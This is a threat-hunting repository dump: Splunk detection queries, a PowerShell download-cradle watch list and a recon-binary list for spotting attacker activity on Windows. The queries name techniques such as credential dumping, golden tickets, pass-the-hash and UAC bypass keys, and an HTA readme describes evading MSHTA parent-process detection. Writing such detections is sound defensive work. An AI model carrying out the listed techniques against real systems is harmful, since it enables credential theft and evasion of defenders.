├── BigAssReconList.txt
├── CiscoDomain1M
├── HTAtricks
├── newproc.txt
├── newserv.hta
└── readme
├── PSDLCradleWatchList
├── README.md
├── SigmaRules
└── Sysmon
│ └── test.yml
├── Splunk
├── CMSTP
├── CreateRemoteThread
├── DCCredDump
├── DCOMShellWindows
├── DCenum
├── GoldenTicket
├── IEExecnetcon
├── JSC
├── MMCChild
├── Ransomware
├── SysmonNetConHelper
├── UACbypassreg
├── accessibilityabuse
├── attrib
├── batfileuser
├── bginfochild
├── bitsadmin
├── certutiladdroot
├── certutildownload
├── certutilencodedecode
├── cmdnotinsystem
├── copyB
├── cscartifacts
├── dbgsrvremote
├── debugwebconfig
├── dnscmd
├── dsadd
├── echoappend
├── explicitloginanalytic
├── explicitwmic
├── findstrnetstat
├── fltmc
├── funkyprocestree
├── githubcmdline
├── githubnobrowser
├── gscriptlocal
├── hashpassedviacmd
├── installutil
├── loaddllbypass
├── lsasstouchie
├── mavinject
├── meterpgetstystem
├── mpcmdrun
├── mshta
├── netuser
├── powershellrunspace
├── pth2
├── pthbasic
├── recyclebinexe
├── remoteenum
├── removedefenderdefinitions
├── roastiekerb
├── scheduledtaskCMDLine
├── selfdelete
├── shimreg
├── shimsdb
├── singlecharproc
├── startupexe
├── susprecyclebinfiles
├── trackerdllinj
├── vaultcmd
├── w3wpchild
├── wevtutil
└── wmitraceprocesscreate
├── SuspiciousPowershellScriptText
├── XMLcradle.txt
├── cmd.exe
├── evil.inf
├── evil.sct
├── generictest.txt
└── sendkeysPSCradle
/BigAssReconList.txt:
--------------------------------------------------------------------------------
1 | C:\Windows\Sys*\arp.exe
2 | C:\Windows\Sys*\at.exe
3 | C:\Windows\Sys*\bcdedit.exe
4 | *\bcp.exe
5 | C:\Windows\Sys*\cacls.exe
6 | C:\Windows\Sys*\chcp.com
7 | C:\Windows\Sys*\cscript.exe
8 | C:\Windows\Sys*\fsutil.exe
9 | C:\Windows\Sys*\ftp.exe
10 | C:\Windows\Sys*\ipconfig.exe
11 | C:\Windows\Sys*\klist.exe
12 | C:\Windows\Sys*\nbtstat.exe
13 | C:\Windows\Sys*\net.exe
14 | C:\Windows\Sys*\net1.exe
15 | C:\Windows\Sys*\netsh.exe
16 | C:\Windows\Sys*\nltest.exe
17 | *\psexec.exe
18 | C:\Windows\Sys*\reg.exe
19 | C:\Windows\Sys*\route.exe
20 | C:\Windows\Sys*\runas.exe
21 | C:\Windows\Sys*\sc.exe
22 | C:\Windows\Sys*\schtasks.exe
23 | C:\Windows\Sys*\sethc.exe
24 | *\sqlcmd.exe
25 | C:\Windows\System32\sysprep\sysprep.exe
26 | C:\Windows\Sys*\systeminfo.exe
27 | C:\Windows\Sys*\tree.com
28 | C:\Windows\Sys*\tasklist.exe
29 | C:\Windows\Sys*\vssadmin.exe
30 | C:\Windows\Sys*\whoami.exe
31 | C:\Windows\Sys*\winrm.cmd
32 | C:\Windows\Sys*\winrs.exe
33 | C:\Windows\Sys*\wmic.exe
34 | C:\Windows\Sys*\wscript.exe
35 | C:\Windows\Sys*\wusa.exe
36 | C:\Windows\Sys*\query.exe
37 | C:\Windows\Sys*\quser.exe
38 | C:\Windows\Sys*\qprocess.exe
39 | C:\Windows\Sys*\tracert.exe
40 | C:\Windows\Sys*\taskkill.exe
41 | C:\Windows\Sys*\wevutil.exe
42 | C:\Windows\Sys*\taskeng.exe
43 |
--------------------------------------------------------------------------------
/CiscoDomain1M:
--------------------------------------------------------------------------------
1 | Cisco's top 1m popular domains. Useful for building a list to narrow down potential malicious C2. Not exactly sure how often this is updated.
2 |
3 | http://s3-us-west-1.amazonaws.com/umbrella-static/index.html
4 |
--------------------------------------------------------------------------------
/HTAtricks/newproc.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/HTAtricks/newserv.hta:
--------------------------------------------------------------------------------
1 |
2 |
3 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/HTAtricks/readme:
--------------------------------------------------------------------------------
1 |
2 |
3 | should spawn new process or service from HTA without being a child of MSHTA(blue teamers will be looking for this).
4 |
5 | Sources
6 | https://twitter.com/enigma0x3/status/870810601483894784
7 | http://seclists.org/vuln-dev/2004/Mar/3
8 |
--------------------------------------------------------------------------------
/PSDLCradleWatchList:
--------------------------------------------------------------------------------
1 | *WebClient*
2 | *DownloadFile*
3 | *DownloadString*
4 | *DownloadData*
5 | *Start-BitsTransfer*
6 | *Msxml2.XMLHTTP*
7 | *WinHttpRequest*
8 | *WebRequest*
9 | *InternetExplorer.Application*
10 | *restmethod*
11 | *iex*(*iwr*
12 | *comobject*InternetExplorer*
13 | *System.Xml.XmlDocument*
14 | *nslookup -querytype=txt*
15 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ThreatHuntingStuff
2 |
3 | Lots of stuff coming soon. Need to start dumping my favorite Splunk queries. Company is currently switching webhosts, so past blog material is unavailable atm. I did upload a local HTML copy of the netshell helper DLL persistence/loading technique due to it making Mitre's ATT&CK matrix this month. The link on the MITRE wiki is broken.
4 |
5 | https://attack.mitre.org/wiki/Technique/T1128
6 |
7 | Link to HTML view
8 |
9 | https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
10 |
11 | 4/8/17 Sigma repo created
12 |
13 | Reference: https://github.com/Neo23x0/sigma
14 |
--------------------------------------------------------------------------------
/SigmaRules/Sysmon/test.yml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Splunk/CMSTP:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 ParentProcessName="*\\cmstp.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/CreateRemoteThread:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=8 (SourceImage=*excel.exe OR SourceImage=*winword.exe OR SourceImage=*powerpnt.exe OR SourceImage=*msaccess.exe OR SourceImage=*visio.exe OR SourceImage=*ois.exe OR SourceImage=*infopath.exe OR SourceImage=*mspub.exe OR SourceImage=*vpreview.exe OR SourceImage=*pptview.exe OR SourceImage=*wordpad.exe OR SourceImage=*outlook.exe OR SourceImage=*acrord32.exe OR SourceImage=*acrobat.exe OR SourceImage=*PDFPlus.exe OR SourceImage=*java.exe OR SourceImage=*javaws.exe OR SourceImage=*javaw.exe OR SourceImage=*cmd.exe OR SourceImage=*powershell.exe OR SourceImage=*powershell_ise.exe OR SourceImage=*csc.exe OR SourceImage=*wscript.exe OR SourceImage=*jsc.exe OR SourceImage=*jscript.exe OR SourceImage=*vbc.exe OR SourceImage=*cscript.exe OR SourceImage=*verclsid.exe OR SourceImage=*mshta.exe OR SourceImage=*rundll32.exe OR SourceImage=*regsvr32.exe OR SourceImage=*regasm.exe OR SourceImage=*regsvcs.exe OR SourceImage=*installutil.exe OR SourceImage=*msbuild.exe) OR (TargetImage=*explorer.exe OR TargetImage=*lsass.exe OR TargetImage=*services.exe) OR (StartAddress=*0B80) OR ((SourceImage="C:\\Windows\\System32\\cscript.exe" OR SourceImage="C:\\Windows\\System32\\wscript.exe" OR SourceImage="C:\\Windows\\System32\\mshta.exe") TargetImage="C:\\Windows\\SysWOW64\\*")
2 | |fields Computer, StartFunction, SourceImage, StartModule, TargetImage
3 | |eval StartFunction=if(isnull(StartFunction),"missing",StartFunction)
4 | |eval StartModule=if(isnull(StartModule),"missing",StartModule)
5 | |eval TargetImage=if(isnull(TargetImage),"missing",TargetImage)
6 | |eval SourceImage=if(isnull(SourceImage),"missing",SourceImage)
7 |
--------------------------------------------------------------------------------
/Splunk/DCCredDump:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ((Filename=vssadmin.exe) CommandLine="*create*" OR CommandLine="*shadowcopy*") OR (Filename=ntdsutil.exe) OR (Filename=diskshadow.exe)
2 |
--------------------------------------------------------------------------------
/Splunk/DCOMShellWindows:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 direction=inbound Filename=explorer.exe
2 | | where dest_port >= 49152| where SourcePort >=49152
3 |
--------------------------------------------------------------------------------
/Splunk/DCenum:
--------------------------------------------------------------------------------
1 | sourcetype =XmlWinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 (((((Image="*dsquery.exe") (CommandLine="*computer*") OR (CommandLine="*group*") OR (CommandLine="*server*") OR
2 | CommandLine="*user*")))) OR (((Image="*WMIC.exe") (CommandLine=* NAMESPACE: \\root\\directory\\ldap PATH ds_computer GET*) OR (CommandLine=* NAMESPACE: \\root\\directory\\ldap PATH ds_group GET*) OR
3 | (CommandLine=wmic* NAMESPACE: \\root\\directory\\ldap PATH ds_user GET*))) OR ((((Image="*net.exe") (CommandLine="*group*") OR (CommandLine="*Domain Controllers*") OR (CommandLine="*Domain Admins*")
4 | OR (CommandLine="*/domain") OR (CommandLine="*/domain *"))))
5 |
--------------------------------------------------------------------------------
/Splunk/GoldenTicket:
--------------------------------------------------------------------------------
1 | sourcetype="XmlWinEventLog:Security" (EventCode=4624 AuthenticationPackageName=Kerberos TargetDomainName="*.*") OR (EventCode=4672 SubjectDomainName="-" OR SubjectDomainName="")
2 |
--------------------------------------------------------------------------------
/Splunk/IEExecnetcon:
--------------------------------------------------------------------------------
1 | sourcetype="*wineventlog:microsoft-windows-sysmon/operational" EventCode=3 Filename="IEExec.exe" Initiated="true" | eval DestinationHostname = if(isnull(DestinationHostname), "Unknown", DestinationHostname)
2 |
--------------------------------------------------------------------------------
/Splunk/JSC:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\jsc.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/MMCChild:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentFilename=mmc.exe Filename!=mmc.exe ParentCommandLine!="*.msc*" Filename!=ctfmon.exe
2 |
--------------------------------------------------------------------------------
/Splunk/Ransomware:
--------------------------------------------------------------------------------
1 | These rules look for commonly used built-in Windows commands used by ransomware to disable system recovery. Looks for execution of vssadmin, bcdedit, and wbadmin by a single user account within 60 seconds of eachother.
2 |
3 | Windows Security Log
4 |
5 | sourcetype="" EventCode=4688
6 | NewProcessName="C:\\Windows\\Sys*\\vssadmin.exe" OR
7 | NewProcessName="C:\\Windows\\Sys*\\bcdedit.exe" OR
8 | NewProcessName="C:\\Windows\\Sys*\\wbadmin.exe"
9 | |transaction SubjectUserName maxspan=60s
10 | |eval ProcCount = mvcount(NewProcessName)
11 | |where ProcCount > 1
12 | |table _time, host, SubjectUserName, NewProcessName, CommandLine
13 |
14 | Sysmon
15 |
16 | sourcetype="" EventCode=1
17 | Image="C:\\Windows\\Sys*\\vssadmin.exe" OR
18 | Image="C:\\Windows\\Sys*\\bcdedit.exe" OR
19 | Image="C:\\Windows\\Sys*\\wbadmin.exe"
20 | |transaction User maxspan=60s
21 | |eval ProcCount = mvcount(Image)
22 | |where ProcCount > 1
23 | |table _time,Computer, User, Image, CommandLine, ParentImage, ParentCommandLine
24 |
25 | Note: My Splunk instance only wants double backslashes when searching file paths. Yours may not. Some customization may be required.
26 |
27 |
--------------------------------------------------------------------------------
/Splunk/SysmonNetConHelper:
--------------------------------------------------------------------------------
1 | Useful helper script for correlating sysmon netcon logs with their process execution counterparts by tying them to the ProcessGuid.
2 | EvtCode 3 events don't list the commandline, parent process, or parent process commandline of a process that communicates with a another host.
3 | You can keep or remove the dports. It helps trim the noise. Most actors will try to exfil or use C2 over these ports.
4 |
5 |
6 | sourcetype="" (EventCode=1 Filename=".exe") OR
7 | (EventCode=3 Filename="" Initiated="true" DestinationPort=80
8 | OR DestinationPort=443 OR DestinationPort=53 OR DestinationPort=8080 )
9 | |eval PGUID=coalesce(ProcessGuid,ProcessGuid)
10 | | eval same_host = if(src_ip == dest_ip, "yes", "no")
11 | | search same_host = "no"
12 | |stats values(User) as User values(Computer) as
13 | Computer, values(Image) as Image, values(CommandLine) as CommandLine,
14 | values(ParentImage) as ParentImage, values(ParentCommandLine) as
15 | ParentCommandLine, values(DestinationHostname) as DestinationHostname,
16 | values(DestinationIp) as DestIp, values(DestinationPort) as DPort by PGUID|
17 | search CommandLine!="" AND DestIp!=""
18 |
19 |
20 |
21 | Update: 7/18/2017, some Sysmon Event 3 codes have a ProcessGuid of all 0s so correlation will not always be available. Even if the Event Code 1 does have an Event Code 3 mate. More testing is needed.
22 |
--------------------------------------------------------------------------------
/Splunk/UACbypassreg:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=12 OR EventCode=13 OR EventCode=14
2 | (TargetObject="*\\mscfile\\shell\\open\\command*"
3 | OR TargetObject="*\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe*"
4 | OR TargetObject="*\\exefile\\shell\\runas\\command*")
5 |
--------------------------------------------------------------------------------
/Splunk/accessibilityabuse:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (ParentImage=*\\WinLogon.exe OR ParentImage=*\\Utilman.exe) (Image=*\\cmd.exe OR Image=*\\net.exe OR Image=*\\Powershell.exe)
2 |
--------------------------------------------------------------------------------
/Splunk/attrib:
--------------------------------------------------------------------------------
1 | sourcetype=*WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 Filename=attrib.exe CommandLine="* +h*"
2 |
--------------------------------------------------------------------------------
/Splunk/batfileuser:
--------------------------------------------------------------------------------
1 | sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 Filename=cmd.exe (CommandLine="*\\programdata\\*" OR CommandLine="*C:\\Users\\*") AND (ParentCommandLine="*.bat*" OR ParentCommandLine="*.cmd*") User!="NT AUTHORITY\\SYSTEM"
2 |
--------------------------------------------------------------------------------
/Splunk/bginfochild:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentImage=*\\bginfo.exe
2 |
--------------------------------------------------------------------------------
/Splunk/bitsadmin:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 NewProcessName="*\\bitsadmin.exe" CommandLine="* \/transfer*" OR CommandLine="* \/download*" OR CommandLine="* \/addfile*" OR CommandLine="* \/upload*"
2 |
--------------------------------------------------------------------------------
/Splunk/certutiladdroot:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\certutil.exe" CommandLine="*-addstore*root*"
2 |
--------------------------------------------------------------------------------
/Splunk/certutildownload:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\certutil.exe" (CommandLine="*ping*" OR CommandLine="*split*")
2 |
--------------------------------------------------------------------------------
/Splunk/certutilencodedecode:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\certutil.exe" (CommandLine="*decode*" OR CommandLine="*encode*")
2 |
--------------------------------------------------------------------------------
/Splunk/cmdnotinsystem:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" ParentFilename="cmd.exe" ParentImage!="*\\Windows\\System32\\*" ParentImage!="*:\\Windows\\SysWOW64\\*" ParentImage!="*:\\Windows\\winsxs\\x86_microsoft-windows-commandprompt*" User!="*INFORMATICS\\*" User!="SANDBOX\\*" CommandLine!="C:\\Windows\\system32\\*" ParentImage!="*:\\Windows\\winsxs\\amd64_microsoft-windows-commandprompt*" ParentImage!="*:\\Windows\\winsxs\\WOW64_microsoft-windows-commandprompt*"
2 |
--------------------------------------------------------------------------------
/Splunk/copyB:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 copy
2 | | search CommandLine="*copy /b*"
3 |
--------------------------------------------------------------------------------
/Splunk/cscartifacts:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 Filename=csc.exe OR Filename=vbc.exe OR Filename=Microsoft.Workflow.Compiler.exe CommandLine!="*.cmdline*" CommandLine!="*.rsp*"
2 |
3 |
--------------------------------------------------------------------------------
/Splunk/dbgsrvremote:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 Filename=dbgsrv.exe Initiated=true
2 |
--------------------------------------------------------------------------------
/Splunk/debugwebconfig:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 aspnet_regiis
2 | | search NewProcessName="*\\aspnet_regiis.exe" CommandLine="-pd*"
3 |
--------------------------------------------------------------------------------
/Splunk/dnscmd:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 dnscmd.exe
2 | | search CommandLine="*/serverlevelplugindll*"
3 |
--------------------------------------------------------------------------------
/Splunk/dsadd:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventID=4688 Caller_User_Name!="*$" Caller_User_Name!="*svc*" NewProcessName=*\\dsadd.exe
2 |
--------------------------------------------------------------------------------
/Splunk/echoappend:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 Filename=cmd.exe OR Filename=powershell.exe (CommandLine="*@echo *" OR CommandLine="*@ echo *") CommandLine="*>>*" CommandLine="*&*"
2 |
--------------------------------------------------------------------------------
/Splunk/explicitloginanalytic:
--------------------------------------------------------------------------------
1 | sourcetype="XmlWinEventLog:Security" EventCode=4648| transaction user maxspan=15m | eval whatever=mvcount(dest) |
2 | where whatever>5
3 |
--------------------------------------------------------------------------------
/Splunk/explicitwmic:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventID=4648 WMIC.exe
2 | | search user!="*$" Process_Name="*WMIC.exe" Target_Server_Name!="localhost" Additional_Information!="localhost"
3 | | search Target_Server_Name!="*$*"
4 |
--------------------------------------------------------------------------------
/Splunk/findstrnetstat:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 (NewProcessName=*\\findstr.exe OR NewProcessName=*\\find.exe) CommandLine=*445* OR CommandLine=*3389* OR CommandLine=*:22* OR CommandLine=*5985* OR CommandLine=*5986* OR CommandLine=*password* user!="*$" user!=-
2 | | search NOT [|inputlookup PHX_WL_findstrnetstat.csv | fields - notes]
3 | | fillnull value=NULL| search CommandLine!=NULL
4 | | stats values(user) as user, values(Computer) as Computer, values(CreatorProcessName), count(CommandLine) as count by CommandLine
5 |
--------------------------------------------------------------------------------
/Splunk/fltmc:
--------------------------------------------------------------------------------
1 | sourcetype=*WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 Filename=fltmc.exe CommandLine="*unload*" OR CommandLine="*detach*"
2 |
--------------------------------------------------------------------------------
/Splunk/funkyprocestree:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
2 | (Filename="svchost.exe" ParentImage!="*:\\Windows\\system32\\services.exe" ParentImage!="*:\\Windows\\sysWOW64\\services.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" ParentImage!="*:\\Windows\\system32\\rpcnet.exe" ParentImage!="*:\\Windows\\System32\\rpcnetp.exe" ParentImage!="*:\\Windows\\sysWOW64\\rpcnet.exe" CommandLine!="C:\\Windows\\System32\\svchost.exe -k LocalServiceAndNoImpersonation" User!="NT AUTHORITY\\*") OR
3 | (Filename="lsm.exe" ParentImage!="*:\\Windows\\system32\\wininit.exe" ParentImage!="*:\\Windows\\sysWOW64\\wininit.exe" User!="NT AUTHORITY\\*") OR
4 | (Filename="csrss.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" User!="NT AUTHORITY\\*") OR
5 | (Filename="wininit.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" User!="NT AUTHORITY\\*") OR
6 | (Filename="services.exe" ParentImage!="*:\\Windows\\system32\\wininit.exe" ParentImage!="*:\\Windows\\sysWOW64\\wininit.exe" ParentImage!="*:\\Windows\\explorer.exe" ParentImage!="*:\\windows\\system32\\services.exe" User!="NT AUTHORITY\\*") OR
7 | (Filename="srss.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" User!="NT AUTHORITY\\*") OR
8 | (Filename="winlogon.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" User!="NT AUTHORITY\\*") OR
9 | (Filename="smss.exe" User!="*\\SYSTEM") OR
10 | (Filename="taskhost.exe" ParentImage!="*:\\Windows\\system32\\services.exe" ParentImage!="*:\\Windows\\sysWOW64\\services.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" ParentImage!="*:\\Windows\\system32\\taskhost.exe" ParentImage!="*:\\Windows\\sysWOW64\\taskhost.exe" User!="NT AUTHORITY\\*") OR
11 | (Filename="conhost.exe" ParentImage!="*:\\Windows\\system32\\csrss.exe" ParentImage!="*:\\Windows\\sysWOW64\\csrss.exe" CommandLine!="\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff" CommandLine!="\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1" User!="NT AUTHORITY\\*" ParentImage!="?")
12 |
--------------------------------------------------------------------------------
/Splunk/githubcmdline:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 github
2 | | search (CommandLine!="*GitHub.VisualStudio*" Filename!="VSInitializer.exe")
3 | | search NewProcessName!="C:\\Program Files\\Git\\*" NewProcessName!=*\\Chrome.exe NewProcessName!=*\\Firefox.exe NewProcessName!="*\\Iexplore.exe" CommandLine!=*\\PortableGit*
4 |
--------------------------------------------------------------------------------
/Splunk/githubnobrowser:
--------------------------------------------------------------------------------
1 | EventCode=3 sysmon github
2 | | search sourcetype="*wineventlog:microsoft-windows-sysmon/operational" Filename!=vmnat.exe Filename!=chrome.exe Filename!=firefox.exe Filename!=Iexplore.exe Filename!=MicrosoftEdgeCP.exe FileName!=MicrosoftEdge.exe
3 | | search DestinationHostname="*github*"
4 |
--------------------------------------------------------------------------------
/Splunk/gscriptlocal:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentFilename="Gpscript.exe" ParentCommandLine="*/logon" CommandLine!="*\\\\*" CurrentDirectory="C:\\windows\\System32\\GroupPolicy\\User\\Scripts\\Logon\\"
2 |
--------------------------------------------------------------------------------
/Splunk/hashpassedviacmd:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 |rex field=CommandLine "(?\b[A-Fa-f0-9]{32}\b)" | search CommandLineHash="*" | table _time, dvc, Account_Name, NewProcessName, CommandLine, CommandLineHash, New_Process_ID, Creator_Process_Name
2 |
--------------------------------------------------------------------------------
/Splunk/installutil:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\installutil.exe" CommandLine="*/U *.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/loaddllbypass:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 CommandLine="*\\Users\\*" (Image="*\\rundll32.exe" OR Image="*\\regsvr32.exe" OR Image="*\\regasm.exe" OR Image="*\\regsvcs.exe" OR Image="*\\installutil.exe" ParentImage="*\\cmd.exe" OR ParentImage="*\\=powershell.exe" OR ParentImage="*\\=powershell_ise.exe" OR ParentImage="*\\csc.exe" OR ParentImage="*\\wscript.exe" OR ParentImage="*\\jsc.exe" OR ParentImage="*\\jscript.exe" OR ParentImage="*\\vbc.exe" OR ParentImage="*\\cscript.exe" OR ParentImage="*\\verclsid.exe" OR ParentImage="*\\mshta.exe" OR ParentImage="*\\msbuild.exe" OR ParentImage="*\\scrcons.exe" OR ParentImage="*\\IEExec.exe" OR ParentImage="*\\sh.exe" OR ParentImage="*\\odbcconf.exe" OR ParentImage="*\\hh.exe" OR ParentImage="*\\bash.exe" OR ParentImage="*\\caspol.exe" OR ParentImage="*\\pcalua.exe" OR ParentImage="*\\wmic.exe" OR ParentImage="*\\scriptrunner.exe" OR ParentImage="*\\mftrace.exe" OR ParentImage="*\\appvlp.exe")
2 |
3 | | rex field=CommandLine "(?i)[^\w](?\w+\.(dll|cpl))"
4 | | where isnotnull(dll_name)
5 | | where ProcessGuid != ParentProcessGuid
6 |
--------------------------------------------------------------------------------
/Splunk/lsasstouchie:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4663 ObjectName="\\Device\\*\\Windows\\System32\\lsass.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/mavinject:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventID=4688 Caller_User_Name!="*$" Caller_User_Name!="*svc*" NewProcessName=*\\mavinject.exe
2 |
--------------------------------------------------------------------------------
/Splunk/meterpgetstystem:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 CommandLine="*cmd.exe* /c echo * \\\\.\\pipe\\*"
2 |
--------------------------------------------------------------------------------
/Splunk/mpcmdrun:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\mpcmdrun.exe" CommandLine="*remove*"
2 |
--------------------------------------------------------------------------------
/Splunk/mshta:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688
2 | | search (NewProcessName="*\\rundll32.exe" AND CommandLine="*mshtml*RunHTMLApplication*") OR (NewProcessName="*\\mshta.exe" AND CommandLine="*http*") OR (NewProcessName="*\\regsvr32.exe" CommandLine="*scrobj*")
3 | | rex field=CommandLine mode=sed "s/[^a-zA-Z0-9]//g"
4 |
--------------------------------------------------------------------------------
/Splunk/netuser:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (Image=*\\net.exe OR Image=*\\net1.exe) (CommandLine="* use *") (CommandLine="*Admin$*" OR CommandLine="*C$*" OR CommandLine="*IPC$*" OR CommandLine="*D$*" OR CommandLine="*NETLOGON*" OR CommandLine="*SYSVOL*"
2 |
--------------------------------------------------------------------------------
/Splunk/powershellrunspace:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Security" EventCode=4688 NewProcessName!="*:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" NewProcessName!="*:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" NewProcessName!="*:\\Windows\\System32\\nbtstat.exe" NewProcessName!="*:\Windows\SysWOW64\ARP.EXE" NewProcessName!="*:\\Windows\\System32\\sdiagnhost.exe"
2 | |eval itime = _time
3 | |join type=left max=0 Computer, NewProcessId [search sourcetype="*WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=53504 Sid!="S-1-5-18"| rename ComputerName as Computer| rex field=Message "\: (?\w+) in"| eval ptime = _time| eval NewProcessId = lower(tostring(process_id,"hex"))| table Computer, NewProcessId, ptime, Message]
4 | | where (itime - 5 <= ptime AND ptime <= itime + 5) OR (isnull(itime))
5 | | eval ptime = strftime(ptime,"%x %X"), itime = strftime(itime,"%x %X")
6 | | table ptime, Computer, Message, NewProcessId, itime, NewProcessName, CommandLine
7 |
--------------------------------------------------------------------------------
/Splunk/pth2:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4624 Logon_Type=9 AuthenticationPackageName=Negotiate LogonProcessName=seclogo
2 | | search NOT IpAddress="::1"
3 |
--------------------------------------------------------------------------------
/Splunk/pthbasic:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Security" EventCode=4624 Logon_Type=3 Authentication_Package=NTLM| table _time, ComputerName, TargetUserName, Security_ID, Package_Name__NTLM_only_
2 |
--------------------------------------------------------------------------------
/Splunk/recyclebinexe:
--------------------------------------------------------------------------------
1 | source="*WinEventLog:Security" EventCode=4688 NewProcessName="*\\$recycle.bin\\*"
2 | | rename host as hostname_ip, NewProcessName as image, CommandLine as commandline
3 | | eval indicator_group = "Hostname: ".hostname_ip." Image:" .image." CommandLine: ".commandline
4 | | table hostname_ip, commandline
5 |
--------------------------------------------------------------------------------
/Splunk/remoteenum:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ((Filename=tasklist.exe OR Filename=systeminfo.exe OR Filename=taskkill.exe) CommandLine="*\/S *") OR ((Filename=sc.exe OR Filename=reg.exe) CommandLine="* \\\\*")
2 |
--------------------------------------------------------------------------------
/Splunk/removedefenderdefinitions:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\mpcmdrun.exe" CommandLine="*remove*"
2 | | fillnull value=NA ParentProcessName
3 | | rename Computer as hostname_ip, SubjectUserName as username, NewProcessName as image, CommandLine as commandline, ParentProcessName as parent_image
4 | | eval indicator_group = "Host: ".hostname_ip." User: ".username." Image: ".image." CommandLine: ".commandline." ParentImage: ".parent_image
